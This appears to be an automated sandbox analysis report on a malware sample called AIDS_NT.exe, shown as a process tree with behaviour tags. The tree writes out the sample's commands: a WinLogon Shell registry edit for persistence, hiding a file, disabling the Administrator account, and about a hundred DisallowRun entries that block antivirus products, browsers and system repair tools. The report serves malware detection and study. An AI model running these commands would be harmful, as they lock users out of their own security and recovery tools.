PID 3908 wrote to memory of 4456	3908	cmd.exe	reg.exe
PID 3908 wrote to memory of 4124	3908	cmd.exe	reg.exe
PID 3908 wrote to memory of 4124	3908	cmd.exe	reg.exe
PID 3908 wrote to memory of 4124	3908	cmd.exe	reg.exe
PID 3908 wrote to memory of 4128	3908	cmd.exe	reg.exe
PID 3908 wrote to memory of 4128	3908	cmd.exe	reg.exe
PID 3908 wrote to memory of 4128	3908	cmd.exe	reg.exe
PID 3908 wrote to memory of 4844	3908	cmd.exe	reg.exe
PID 3908 wrote to memory of 4844	3908	cmd.exe	reg.exe
PID 3908 wrote to memory of 4844	3908	cmd.exe	reg.exe
PID 3908 wrote to memory of 996	3908	cmd.exe	reg.exe
PID 3908 wrote to memory of 996	3908	cmd.exe	reg.exe
PID 3908 wrote to memory of 996	3908	cmd.exe	reg.exe
PID 3908 wrote to memory of 1520	3908	cmd.exe	reg.exe
PID 3908 wrote to memory of 1520	3908	cmd.exe	reg.exe
PID 3908 wrote to memory of 1520	3908	cmd.exe	reg.exe
PID 3908 wrote to memory of 2444	3908	cmd.exe	reg.exe
PID 3908 wrote to memory of 2444	3908	cmd.exe	reg.exe
PID 3908 wrote to memory of 2444	3908	cmd.exe	reg.exe
PID 3908 wrote to memory of 708	3908	cmd.exe	reg.exe

Views/modifies file attributes 1 TTPs 1 IoCs
evasion

Hidden Files and Directories
T1158

Processes:

attrib.exe

pid process

2200 attrib.exe

pid	process
2200	attrib.exe

C:\Users\Admin\AppData\Local\Temp\AIDS_NT.exe
"C:\Users\Admin\AppData\Local\Temp\AIDS_NT.exe"
1⤵
- Checks computer location settings
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4196
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\RarSFX0\start.bat" "
  2⤵
  - Drops file in Windows directory
  - Suspicious use of WriteProcessMemory
  PID:2552
- - C:\Windows\SysWOW64\reg.exe
    REG ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /f /v Shell
    3⤵
    - Modifies WinLogon for persistence
    PID:1852
- - C:\Windows\SysWOW64\reg.exe
    REG ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /f /v Shell /d "explorer.exe, C:\Windows\AIDS_NT_Instructions.txt, C:\Windows\aids.bat, C:\Windows\42.exe, C:\Windows\1.bat"
    3⤵
    - Modifies WinLogon for persistence
    PID:320
- - C:\Windows\SysWOW64\reg.exe
    REG ADD "HKEY_CURRENT_USER\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d C:\Windows\1.jpg /f
    3⤵
    - Sets desktop wallpaper using registry
    PID:236
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\RarSFX0\PkgMgr.bat" "
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:3908
- - C:\Users\Admin\AppData\Local\Temp\RarSFX0\nircmd.exe
    nircmd win hide title "C:\Windows\system32\cmd.exe"
    3⤵
    - Executes dropped EXE
    PID:3868
- - C:\Windows\SysWOW64\attrib.exe
    attrib C:\Windows\PkgMgr.bat +h +s +a +r
    3⤵
    - Sets file to hidden
    - Views/modifies file attributes
    PID:2200
- - C:\Windows\SysWOW64\net.exe
    net user ╨É╨┤╨╝╨╕╨╜╨╕╤ü╤é╤Ç╨░╤é╨╛╤Ç /active:no
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:4384
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 user ╨É╨┤╨╝╨╕╨╜╨╕╤ü╤é╤Ç╨░╤é╨╛╤Ç /active:no
      4⤵
      PID:4560
- - C:\Windows\SysWOW64\reg.exe
    REG ADD "HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\System" /f /v HideFastUserSwitching /t REG_DWORD /d "1"
    3⤵
    PID:796
- - C:\Windows\SysWOW64\reg.exe
    REG ADD "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun"
    3⤵
    - Blocks application from running via registry modification
    PID:4500
- - C:\Windows\SysWOW64\reg.exe
    REG ADD "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /f /v "DisallowRun" /t REG_DWORD /d "1"
    3⤵
    PID:1148
- - C:\Windows\SysWOW64\reg.exe
    REG ADD "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun" /v "1" /t REG_SZ /d "MSASCui.exe" /f
    3⤵
    - Blocks application from running via registry modification
    PID:1516
- - C:\Windows\SysWOW64\reg.exe
    REG ADD "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun" /v "2" /t REG_SZ /d "msmpeng.exe" /f
    3⤵
    - Blocks application from running via registry modification
    PID:2992
- - C:\Windows\SysWOW64\reg.exe
    REG ADD "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun" /v "3" /t REG_SZ /d "msdt.exe" /f
    3⤵
    - Blocks application from running via registry modification
    PID:4456
- - C:\Windows\SysWOW64\reg.exe
    REG ADD "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun" /v "4" /t REG_SZ /d "ProcessHacker.exe" /f
    3⤵
    - Blocks application from running via registry modification
    PID:4124
- - C:\Windows\SysWOW64\reg.exe
    REG ADD "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun" /v "5" /t REG_SZ /d "spideragent.exe " /f
    3⤵
    PID:4128
- - C:\Windows\SysWOW64\reg.exe
    REG ADD "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun" /v "6" /t REG_SZ /d "SbieSvc.exe " /f
    3⤵
    - Blocks application from running via registry modification
    PID:4844
- - C:\Windows\SysWOW64\reg.exe
    REG ADD "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun" /v "7" /t REG_SZ /d "SearchUI.exe " /f
    3⤵
    - Blocks application from running via registry modification
    PID:996
- - C:\Windows\SysWOW64\reg.exe
    REG ADD "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun" /v "8" /t REG_SZ /d "dwscanner.exe" /f
    3⤵
    PID:1520
- - C:\Windows\SysWOW64\reg.exe
    REG ADD "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun" /v "9" /t REG_SZ /d "aswEngSrv.exe" /f
    3⤵
    PID:2444
- - C:\Windows\SysWOW64\reg.exe
    REG ADD "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun" /v "10" /t REG_SZ /d "AvastSvc.exe" /f
    3⤵
    PID:708
- - C:\Windows\SysWOW64\reg.exe
    REG ADD "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun" /v "11" /t REG_SZ /d "AvastUI.exe" /f
    3⤵
    PID:3476
- - C:\Windows\SysWOW64\reg.exe
    REG ADD "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun" /v "12" /t REG_SZ /d "AvastBrowserCrashHandler.exe" /f
    3⤵
    PID:3164
- - C:\Windows\SysWOW64\reg.exe
    REG ADD "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun" /v "13" /t REG_SZ /d "chrome.exe" /f
    3⤵
    - Blocks application from running via registry modification
    PID:2924
- - C:\Windows\SysWOW64\reg.exe
    REG ADD "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun" /v "14" /t REG_SZ /d "VirtualBox.exe" /f
    3⤵
    PID:4768
- - C:\Windows\SysWOW64\reg.exe
    REG ADD "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun" /v "15" /t REG_SZ /d "CCleaner64.exe" /f
    3⤵
    - Blocks application from running via registry modification
    PID:3620
- - C:\Windows\SysWOW64\reg.exe
    REG ADD "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun" /v "16" /t REG_SZ /d "CCleaner32.exe" /f
    3⤵
    - Blocks application from running via registry modification
    PID:1784
- - C:\Windows\SysWOW64\reg.exe
    REG ADD "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun" /v "17" /t REG_SZ /d "CCleaner86.exe" /f
    3⤵
    PID:720
- - C:\Windows\SysWOW64\reg.exe
    REG ADD "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun" /v "18" /t REG_SZ /d "CCleaner.exe" /f
    3⤵
    - Blocks application from running via registry modification
    PID:1892
- - C:\Windows\SysWOW64\reg.exe
    REG ADD "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun" /v "19" /t REG_SZ /d "firefox.exe" /f
    3⤵
    - Blocks application from running via registry modification
    PID:1012
- - C:\Windows\SysWOW64\reg.exe
    REG ADD "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun" /v "20" /t REG_SZ /d "taskmgr.exe" /f
    3⤵
    - Blocks application from running via registry modification
    PID:4624
- - C:\Windows\SysWOW64\reg.exe
    REG ADD "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun" /v "21" /t REG_SZ /d "opera.exe" /f
    3⤵
    - Blocks application from running via registry modification
    PID:2360
- - C:\Windows\SysWOW64\reg.exe
    REG ADD "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun" /v "22" /t REG_SZ /d "iexplore.exe" /f
    3⤵
    - Blocks application from running via registry modification
    PID:5012
- - C:\Windows\SysWOW64\reg.exe
    REG ADD "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun" /v "23" /t REG_SZ /d "perfmon.exe" /f
    3⤵
    - Blocks application from running via registry modification
    PID:1140
- - C:\Windows\SysWOW64\reg.exe
    REG ADD "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun" /v "24" /t REG_SZ /d "msconfig.exe" /f
    3⤵
    - Blocks application from running via registry modification
    PID:3412
- - C:\Windows\SysWOW64\reg.exe
    REG ADD "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun" /v "25" /t REG_SZ /d "WUDFHost.exe" /f
    3⤵
    PID:2356
- - C:\Windows\SysWOW64\reg.exe
    REG ADD "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun" /v "26" /t REG_SZ /d "msconfig.exe" /f
    3⤵
    PID:2656
- - C:\Windows\SysWOW64\reg.exe
    REG ADD "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun" /v "27" /t REG_SZ /d "SecurityHealthSystray.exe" /f
    3⤵
    PID:2296
- - C:\Windows\SysWOW64\reg.exe
    REG ADD "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun" /v "28" /t REG_SZ /d "rstrui.exe" /f
    3⤵
    PID:1976
- - C:\Windows\SysWOW64\reg.exe
    REG ADD "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun" /v "29" /t REG_SZ /d "mcapexe.exe" /f
    3⤵
    PID:3064
- - C:\Windows\SysWOW64\reg.exe
    REG ADD "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun" /v "30" /t REG_SZ /d "McCSPServiceHost.exe " /f
    3⤵
    PID:3560
- - C:\Windows\SysWOW64\reg.exe
    REG ADD "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun" /v "31" /t REG_SZ /d "McInstruTrack.exe" /f
    3⤵
    PID:5040
- - C:\Windows\SysWOW64\reg.exe
    REG ADD "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun" /v "32" /t REG_SZ /d "McPvTray.exe " /f
    3⤵
    - Blocks application from running via registry modification
    PID:4944
- - C:\Windows\SysWOW64\reg.exe
    REG ADD "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun" /v "33" /t REG_SZ /d "mcshield.exe " /f
    3⤵
    PID:5000
- - C:\Windows\SysWOW64\reg.exe
    REG ADD "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun" /v "34" /t REG_SZ /d "McUICnt.exe " /f
    3⤵
    - Blocks application from running via registry modification
    PID:4636
- - C:\Windows\SysWOW64\reg.exe
    REG ADD "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun" /v "35" /t REG_SZ /d "MfeAVSvc.exe " /f
    3⤵
    - Blocks application from running via registry modification
    PID:3284
- - C:\Windows\SysWOW64\reg.exe
    REG ADD "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun" /v "36" /t REG_SZ /d "mfefire.exe " /f
    3⤵
    PID:4320
- - C:\Windows\SysWOW64\reg.exe
    REG ADD "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun" /v "37" /t REG_SZ /d "mfevtps.exe " /f
    3⤵
    - Blocks application from running via registry modification
    PID:460
- - C:\Windows\SysWOW64\reg.exe
    REG ADD "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun" /v "38" /t REG_SZ /d "MMSSHOST.exe " /f
    3⤵
    PID:2092
- - C:\Windows\SysWOW64\reg.exe
    REG ADD "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun" /v "39" /t REG_SZ /d "ModuleCoreService.exe" /f
    3⤵
    PID:1888
- - C:\Windows\SysWOW64\reg.exe
    REG ADD "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun" /v "40" /t REG_SZ /d "control.exe" /f
    3⤵
    PID:1760
- - C:\Windows\SysWOW64\reg.exe
    REG ADD "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun" /v "41" /t REG_SZ /d "avp.exe " /f
    3⤵
    PID:1256
- - C:\Windows\SysWOW64\reg.exe
    REG ADD "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun" /v "42" /t REG_SZ /d "avpui.exe " /f
    3⤵
    PID:5084
- - C:\Windows\SysWOW64\reg.exe
    REG ADD "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun" /v "43" /t REG_SZ /d "kav.exe" /f
    3⤵
    - Blocks application from running via registry modification
    PID:4544
- - C:\Windows\SysWOW64\reg.exe
    REG ADD "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun" /v "44" /t REG_SZ /d "vmware.exe" /f
    3⤵
    - Blocks application from running via registry modification
    PID:3568
- - C:\Windows\SysWOW64\reg.exe
    REG ADD "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun" /v "45" /t REG_SZ /d "msinfo32.exe" /f
    3⤵
    - Blocks application from running via registry modification
    PID:1660
- - C:\Windows\SysWOW64\reg.exe
    REG ADD "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun" /v "46" /t REG_SZ /d "RecoveryDrive.exe" /f
    3⤵
    PID:4000
- - C:\Windows\SysWOW64\reg.exe
    REG ADD "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun" /v "47" /t REG_SZ /d "dwscanner.exe" /f
    3⤵
    - Blocks application from running via registry modification
    PID:2112
- - C:\Windows\SysWOW64\reg.exe
    REG ADD "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun" /v "48" /t REG_SZ /d "spideragent.exe" /f
    3⤵
    - Blocks application from running via registry modification
    PID:1176
- - C:\Windows\SysWOW64\reg.exe
    REG ADD "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun" /v "49" /t REG_SZ /d "uTorrent.exe" /f
    3⤵
    PID:1560
- - C:\Windows\SysWOW64\reg.exe
    REG ADD "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun" /v "50" /t REG_SZ /d "firefox.exe" /f
    3⤵
    - Blocks application from running via registry modification
    PID:3584
- - C:\Windows\SysWOW64\reg.exe
    REG ADD "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun" /v "51" /t REG_SZ /d "regedt32.exe" /f
    3⤵
    PID:4680
- - C:\Windows\SysWOW64\reg.exe
    REG ADD "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun" /v "52" /t REG_SZ /d "resmon.exe" /f
    3⤵
    PID:1700
- - C:\Windows\SysWOW64\reg.exe
    REG ADD "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun" /v "53" /t REG_SZ /d "Defender.exe " /f
    3⤵
    PID:1824
- - C:\Windows\SysWOW64\reg.exe
    REG ADD "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun" /v "54" /t REG_SZ /d "DefenderDaemon.exe" /f
    3⤵
    PID:1580
- - C:\Windows\SysWOW64\reg.exe
    REG ADD "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun" /v "55" /t REG_SZ /d "mbam.exe" /f
    3⤵
    PID:320
- - C:\Windows\SysWOW64\reg.exe
    REG ADD "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun" /v "56" /t REG_SZ /d "mbamtray.exe" /f
    3⤵
    - Blocks application from running via registry modification
    PID:4692
- - C:\Windows\SysWOW64\reg.exe
    REG ADD "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun" /v "57" /t REG_SZ /d "MBAMWsc.exe" /f
    3⤵
    - Blocks application from running via registry modification
    PID:228
- - C:\Windows\SysWOW64\reg.exe
    REG ADD "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun" /v "58" /t REG_SZ /d "mbuns.exe" /f
    3⤵
    PID:236
- - C:\Windows\SysWOW64\reg.exe
    REG ADD "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun" /v "59" /t REG_SZ /d "MbamPt.exe" /f
    3⤵
    - Blocks application from running via registry modification
    PID:4580
- - C:\Windows\SysWOW64\reg.exe
    REG ADD "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun" /v "60" /t REG_SZ /d "MBAMService.exe" /f
    3⤵
    PID:3588
- - C:\Windows\SysWOW64\reg.exe
    REG ADD "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun" /v "61" /t REG_SZ /d "assistant.exe" /f
    3⤵
    PID:2588
- - C:\Windows\SysWOW64\reg.exe
    REG ADD "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun" /v "62" /t REG_SZ /d "malwarebytes_assistant.exe" /f
    3⤵
    - Blocks application from running via registry modification
    PID:2552
- - C:\Windows\SysWOW64\reg.exe
    REG ADD "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun" /v "63" /t REG_SZ /d "ig.exe" /f
    3⤵
    PID:428
- - C:\Windows\SysWOW64\reg.exe
    REG ADD "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun" /v "64" /t REG_SZ /d "browser.exe" /f
    3⤵
    PID:1296
- - C:\Windows\SysWOW64\reg.exe
    REG ADD "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun" /v "65" /t REG_SZ /d "am800.exe" /f
    3⤵
    PID:2200
- - C:\Windows\SysWOW64\reg.exe
    REG ADD "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun" /v "66" /t REG_SZ /d "TOTALCMD64.EXE" /f
    3⤵
    - Blocks application from running via registry modification
    PID:4384
- - C:\Windows\SysWOW64\reg.exe
    REG ADD "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun" /v "67" /t REG_SZ /d "TOTALCMD32.EXE" /f
    3⤵
    PID:796
- - C:\Windows\SysWOW64\reg.exe
    REG ADD "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun" /v "68" /t REG_SZ /d "TOTALCMD86.EXE" /f
    3⤵
    - Blocks application from running via registry modification
    PID:4500
- - C:\Windows\SysWOW64\reg.exe
    REG ADD "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun" /v "69" /t REG_SZ /d "WatchDog.exe" /f
    3⤵
    PID:1432
- - C:\Windows\SysWOW64\reg.exe
    REG ADD "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun" /v "70" /t REG_SZ /d "ProductAgentUI.exe" /f
    3⤵
    - Blocks application from running via registry modification
    PID:1584
- - C:\Windows\SysWOW64\reg.exe
    REG ADD "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun" /v "71" /t REG_SZ /d "ProductAgentService.exe" /f
    3⤵
    PID:4792
- - C:\Windows\SysWOW64\reg.exe
    REG ADD "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun" /v "72" /t REG_SZ /d "DiscoverySrv.exe" /f
    3⤵
    PID:4456
- - C:\Windows\SysWOW64\reg.exe
    REG ADD "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun" /v "73" /t REG_SZ /d "BDSubWiz.exe" /f
    3⤵
    - Blocks application from running via registry modification
    PID:4124
- - C:\Windows\SysWOW64\reg.exe
    REG ADD "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun" /v "74" /t REG_SZ /d "bdreinit.exe" /f
    3⤵
    PID:2352
- - C:\Windows\SysWOW64\reg.exe
    REG ADD "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun" /v "75" /t REG_SZ /d "agentpackage.exe" /f
    3⤵
    PID:2640
- - C:\Windows\SysWOW64\reg.exe
    REG ADD "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun" /v "76" /t REG_SZ /d "setuppackage.exe" /f
    3⤵
    PID:3880
- - C:\Windows\SysWOW64\reg.exe
    REG ADD "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun" /v "77" /t REG_SZ /d "7zFM.exe" /f
    3⤵
    - Blocks application from running via registry modification
    PID:4324
- - C:\Windows\SysWOW64\reg.exe
    REG ADD "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun" /v "78" /t REG_SZ /d "procexp64.exe" /f
    3⤵
    PID:952
- - C:\Windows\SysWOW64\reg.exe
    REG ADD "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun" /v "79" /t REG_SZ /d "procexp.exe" /f
    3⤵
    - Blocks application from running via registry modification
    PID:2264
- - C:\Windows\SysWOW64\reg.exe
    REG ADD "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun" /v "80" /t REG_SZ /d "WinRAR.exe" /f
    3⤵
    PID:4404
- - C:\Windows\SysWOW64\reg.exe
    REG ADD "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun" /v "81" /t REG_SZ /d "BdVpnService.exe " /f
    3⤵
    - Blocks application from running via registry modification
    PID:3664
- - C:\Windows\SysWOW64\reg.exe
    REG ADD "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun" /v "82" /t REG_SZ /d "BdVpnApp.exe " /f
    3⤵
    - Blocks application from running via registry modification
    PID:544
- - C:\Windows\SysWOW64\reg.exe
    REG ADD "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun" /v "83" /t REG_SZ /d "bdservicehost.exe" /f
    3⤵
    PID:1408
- - C:\Windows\SysWOW64\reg.exe
    REG ADD "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun" /v "84" /t REG_SZ /d "bdagent.exe" /f
    3⤵
    - Blocks application from running via registry modification
    PID:4172
- - C:\Windows\SysWOW64\reg.exe
    REG ADD "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun" /v "85" /t REG_SZ /d "bdredline.exe" /f
    3⤵
    - Blocks application from running via registry modification
    PID:4820
- - C:\Windows\SysWOW64\reg.exe
    REG ADD "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun" /v "86" /t REG_SZ /d "ekrn.exe " /f
    3⤵
    - Blocks application from running via registry modification
    PID:3208
- - C:\Windows\SysWOW64\reg.exe
    REG ADD "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun" /v "87" /t REG_SZ /d "eguiProxy.exe" /f
    3⤵
    - Blocks application from running via registry modification
    PID:1000
- - C:\Windows\SysWOW64\reg.exe
    REG ADD "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun" /v "88" /t REG_SZ /d "egui.exe" /f
    3⤵
    PID:368
- - C:\Windows\SysWOW64\reg.exe
    REG ADD "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun" /v "89" /t REG_SZ /d "AvastNM.exe" /f
    3⤵
    - Blocks application from running via registry modification
    PID:820
- - C:\Windows\SysWOW64\reg.exe
    REG ADD "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun" /v "90" /t REG_SZ /d "AVGBrowserCrashHandler.exe" /f
    3⤵
    PID:2804
- - C:\Windows\SysWOW64\reg.exe
    REG ADD "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun" /v "91" /t REG_SZ /d "AVGBrowserCrashHandler64.exe" /f
    3⤵
    PID:4780
- - C:\Windows\SysWOW64\reg.exe
    REG ADD "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun" /v "92" /t REG_SZ /d "AVGUI.exe" /f
    3⤵
    PID:3580
- - C:\Windows\SysWOW64\reg.exe
    REG ADD "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun" /v "93" /t REG_SZ /d "AVGSvc.exe" /f
    3⤵
    PID:4412
- - C:\Windows\SysWOW64\reg.exe
    REG ADD "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun" /v "94" /t REG_SZ /d "aswEngSrv.exe" /f
    3⤵
    - Blocks application from running via registry modification
    PID:1784
- - C:\Windows\SysWOW64\reg.exe
    REG ADD "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun" /v "95" /t REG_SZ /d "wsc_proxy.exe" /f
    3⤵
    PID:2452
- - C:\Windows\SysWOW64\reg.exe
    REG ADD "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun" /v "96" /t REG_SZ /d "am807.exe" /f
    3⤵
    PID:1720
- - C:\Windows\SysWOW64\reg.exe
    REG ADD "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun" /v "97" /t REG_SZ /d "artmoney.exe" /f
    3⤵
    PID:1892
- - C:\Windows\SysWOW64\reg.exe
    REG ADD "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun" /v "98" /t REG_SZ /d "chemax.exe" /f
    3⤵
    - Blocks application from running via registry modification
    PID:1012
- - C:\Windows\SysWOW64\reg.exe
    REG ADD "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun" /v "99" /t REG_SZ /d "Cheat Engine.exe" /f
    3⤵
    PID:1816
- - C:\Windows\SysWOW64\reg.exe
